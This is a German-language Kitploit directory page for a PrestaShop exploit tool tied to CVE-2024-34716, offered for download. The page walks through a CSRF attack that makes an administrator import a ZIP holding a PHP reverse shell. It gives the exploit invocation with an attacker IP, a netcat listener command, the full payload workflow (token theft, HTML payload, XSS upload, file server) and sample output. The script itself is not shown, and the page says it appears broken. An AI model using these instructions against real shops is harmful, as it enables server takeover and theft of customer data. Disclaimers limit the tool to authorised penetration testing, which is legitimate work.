Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Prestashop-CVE-2024-34716 — Automatisiertes CSRF-Exploit-Skript für PrestaShop, das eine PHP-Reverse-Shell über eine präparierte ZIP-Nutzlast hochlädt und ausführt. Erfordert einen Netcat-Listener zum Auffangen der Verbindung. | Kitploit
Tools/GitHubGitHub/0xdtc/prestashop-cve-2024-34716
Payload-GenerierungExploitationShellcodeWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHub0xdtc/prestashop-cve-2024-34716

Prestashop-CVE-2024-34716

Automatisiertes CSRF-Exploit-Skript für PrestaShop, das eine PHP-Reverse-Shell über eine präparierte ZIP-Nutzlast hochlädt und ausführt. Erfordert einen Netcat-Listener zum Auffangen der Verbindung.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
11vor 1 JahrNoch nicht geprüft

Exploit-Skript für CSRF- und Reverse-Shell-Angriff

Dieses Skript automatisiert einen CSRF-Angriff (Cross-Site Request Forgery), um eine PHP-Reverse-Shell auf den Webserver eines Ziels hochzuladen und auszuführen. Die Reverse-Shell wird als ZIP-Datei über ein manipuliertes CSRF-Payload bereitgestellt, das ausgelöst wird, wenn ein privilegierter Benutzer mit einem bestimmten Endpunkt interagiert. Das Skript erfordert eine lauschende Netcat-Instanz, um die Reverse-Shell-Verbindung abzufangen.

Scheint im Moment defekt zu sein, wird später aktualisiert

Voraussetzungen

  • Netcat: Stellen Sie sicher, dass Netcat installiert ist und auf einem bestimmten Port (Standard: 9001) lauschen kann.
  • Python 3: Wird verwendet, um Dateien über HTTP bereitzustellen.
  • Curl & JQ: Werden verwendet, um HTTP-Anfragen zu stellen und JSON-Parsing durchzuführen.

Verwendung

root@kitploit:~
./exploit.sh <target_url> <admin_endpoint> <admin_email> <attacker_ip>

Argumente

  • target_url: Basis-URL des Ziels (z.B. https://example.com).
  • admin_endpoint: Pfad zum Admin-Theme-Import-Endpunkt.
  • admin_email: E-Mail-Adresse eines Administrators (zum Spoofen für das Payload).
  • attacker_ip: IP-Adresse, auf der der Reverse-Shell-Listener die Verbindung empfängt.

Beispiel

root@kitploit:~
./exploit.sh https://victim.com /admin-panel [email protected] 192.168.1.10

Exploit-Workflow

  1. Reverse-Shell-Erstellung: Erzeugt eine PHP-Reverse-Shell mit revshells.com mit der angegebenen attacker_ip und Port 9001.
  2. ZIP-Paketierung: Das Reverse-Shell-Skript (love.php) wird in Love-exploit.zip komprimiert.
  3. CSRF-Token-Abruf: Ruft das CSRF-Token vom Ziel ab, um die Theme-Import-Anfrage zu autorisieren.
  4. HTML-Payload-Konstruktion: Erstellt ein HTML-Payload (csrf_payload.html), das ein JavaScript-Skript enthält, um automatisch eine bösartige Anfrage an das Admin-Panel des Ziels zu senden, um die Reverse-Shell zu importieren.
  5. HTTP-Server-Einrichtung: Ein temporärer HTTP-Server auf Port 8000 stellt Love-exploit.zip zum Import bereit.
  6. XSS-Upload und CSRF-Auslösung: Das CSRF-Payload wird auf die Kontaktseite des Ziels hochgeladen. Wenn darauf zugegriffen wird, löst es den CSRF-Angriff aus.
  7. Reverse-Shell-Listener: Der Angreifer überwacht eingehende Verbindungen vom Opfer mit Netcat.

Ausführungsschritte

  1. Starten Sie einen Netcat-Listener auf Ihrem Rechner:

    root@kitploit:~
    nc -nvlp 9001
    
  2. Führen Sie das Skript aus:

    root@kitploit:~
    ./exploit.sh https://victim.com /admin-panel [email protected] 192.168.1.10
    
  3. Warten Sie, bis das Ziel das CSRF-Payload ausführt und die Reverse-Shell-Verbindung eingeht.

Ausgabe

Das Skript gibt während der Ausführung folgende Informationen aus:

  • Status des CSRF-Token-Abrufs.
  • Status der Reverse-Shell-Erstellung und -Paketierung.
  • Status der Payload-Zustellung und HTTP-Server-Status.

Wichtige Hinweise

  • Berechtigungen: Dieses Skript erfordert eine Berechtigung zur Ausführung auf dem Zielserver. Die unbefugte Nutzung ist illegal und strafbar.
  • Testumgebung: Verwenden Sie es nur in einer kontrollierten, autorisierten Umgebung, z. B. in einem Cybersicherheitslabor.
  • Portkonflikte: Stellen Sie sicher, dass die Ports 8000 (HTTP-Server) und 9001 (Netcat-Listener) frei sind, bevor Sie das Skript ausführen.

Beispielausgabe

root@kitploit:~
[*] Ensure Netcat is listening: nc -nvlp 9001
[*] Awaiting netcat listener...
[*] Creating PHP reverse shell...
[*] Packaging shell as Love-exploit.zip...
[*] Fetching CSRF token...
[+] CSRF token retrieved: <token_value>
[*] Building HTML payload for CSRF...
[*] Converting HTML to PNG...
[*] Checking for existing HTTP server on port 8000...
[*] Starting new HTTP server on port 8000 for payload delivery...
[*] Uploading XSS payload to trigger CSRF...
[*] Keeping script running to monitor for incoming connections...

Dieses Dokument ist für den Einsatz durch Penetrationstester und Cybersicherheitsforscher in kontrollierten Umgebungen bestimmt. Die missbräuchliche Verwendung dieses Werkzeugs für unbefugte Zwecke ist strengstens untersagt.


Haftungsausschluss

Dieses Skript dient ausschließlich zu Bildungszwecken und für rechtlich zulässige Cybersicherheitsbewertungen. Die unbefugte Nutzung gegen ein System ohne Erlaubnis ist illegal und verstößt gegen ethische Richtlinien.

Tool herunterladen